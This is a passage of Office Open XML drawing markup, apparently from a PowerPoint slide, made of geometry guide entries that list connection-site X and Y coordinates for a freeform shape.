              <a:gd name="connsiteX162" fmla="*/ 5983240 w 12192000"/>
              <a:gd name="connsiteY162" fmla="*/ 152755 h 4939827"/>
              <a:gd name="connsiteX163" fmla="*/ 6152287 w 12192000"/>
              <a:gd name="connsiteY163" fmla="*/ 116736 h 4939827"/>
              <a:gd name="connsiteX164" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY164" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX165" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX166" fmla="*/ 6965101 w 12192000"/>
              <a:gd name="connsiteY166" fmla="*/ 25718 h 4939827"/>
              <a:gd name="connsiteX167" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY167" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX168" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY168" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX169" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY169" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX170" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY170" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX171" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY17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43464 w 12192000"/>
              <a:gd name="connsiteY12" fmla="*/ 68367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965101 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 25718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16552 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 189955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36361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3864537 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 200742 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 5887271 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 176084 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 5921577 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 169858 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 5983240 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 152755 h 4939827"/>
              <a:gd name="connsiteX162" fmla="*/ 6152287 w 12192000"/>
              <a:gd name="connsiteY162" fmla="*/ 116736 h 4939827"/>
              <a:gd name="connsiteX163" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY163" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX164" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY164" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX165" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX166" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY166" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX167" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY167" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX168" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY168" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX169" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY169" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX170" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY17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812225 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 189020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24753 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 244380 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 5887271 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 176084 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 5921577 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 169858 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 5983240 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 152755 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 6152287 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 116736 h 4939827"/>
              <a:gd name="connsiteX162" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY162" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX163" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY163" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX164" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY164" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX165" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX166" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY166" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX167" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY167" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX168" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY168" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX169" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY16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074187 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 243226 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 227103 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 5887271 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 176084 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 5921577 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 169858 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 5983240 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 152755 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 6152287 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 116736 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX162" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY162" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX163" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY163" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX164" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY164" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX165" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX166" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY166" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX167" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY167" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX168" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY16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45916 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 261030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885389 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 255259 h 4939827"/>
              <a:gd name="connsiteX115" fmla="*/ 3030844 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 225861 h 4939827"/>
              <a:gd name="connsiteX116" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 227103 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 5887271 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 176084 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 5921577 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 169858 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 5983240 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 152755 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 6152287 w 12192000"/>
              <a:gd name="connsiteY159" fmla="*/ 116736 h 4939827"/>
              <a:gd name="connsiteX160" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY160" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX161" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY161" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX162" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY162" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX163" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY163" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX164" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY164" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX165" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY165" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX166" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY166" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX167" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY16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3030844 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 225861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54496 w 12192000"/>
              <a:gd name="connsiteY112" fmla="*/ 315431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62377 w 12192000"/>
              <a:gd name="connsiteY55" fmla="*/ 286635 h 4939827"/>
              <a:gd name="connsiteX56" fmla="*/ 9287089 w 12192000"/>
              <a:gd name="connsiteY56" fmla="*/ 303891 h 4939827"/>
              <a:gd name="connsiteX57" fmla="*/ 9371484 w 12192000"/>
              <a:gd name="connsiteY57" fmla="*/ 329634 h 4939827"/>
              <a:gd name="connsiteX58" fmla="*/ 9404829 w 12192000"/>
              <a:gd name="connsiteY58" fmla="*/ 339038 h 4939827"/>
              <a:gd name="connsiteX59" fmla="*/ 9427021 w 12192000"/>
              <a:gd name="connsiteY59" fmla="*/ 358784 h 4939827"/>
              <a:gd name="connsiteX60" fmla="*/ 9670844 w 12192000"/>
              <a:gd name="connsiteY60" fmla="*/ 405128 h 4939827"/>
              <a:gd name="connsiteX61" fmla="*/ 9816083 w 12192000"/>
              <a:gd name="connsiteY61" fmla="*/ 416573 h 4939827"/>
              <a:gd name="connsiteX62" fmla="*/ 9936741 w 12192000"/>
              <a:gd name="connsiteY62" fmla="*/ 437044 h 4939827"/>
              <a:gd name="connsiteX63" fmla="*/ 10050093 w 12192000"/>
              <a:gd name="connsiteY63" fmla="*/ 443783 h 4939827"/>
              <a:gd name="connsiteX64" fmla="*/ 10130090 w 12192000"/>
              <a:gd name="connsiteY64" fmla="*/ 459520 h 4939827"/>
              <a:gd name="connsiteX65" fmla="*/ 10173456 w 12192000"/>
              <a:gd name="connsiteY65" fmla="*/ 457749 h 4939827"/>
              <a:gd name="connsiteX66" fmla="*/ 10218232 w 12192000"/>
              <a:gd name="connsiteY66" fmla="*/ 459820 h 4939827"/>
              <a:gd name="connsiteX67" fmla="*/ 10354176 w 12192000"/>
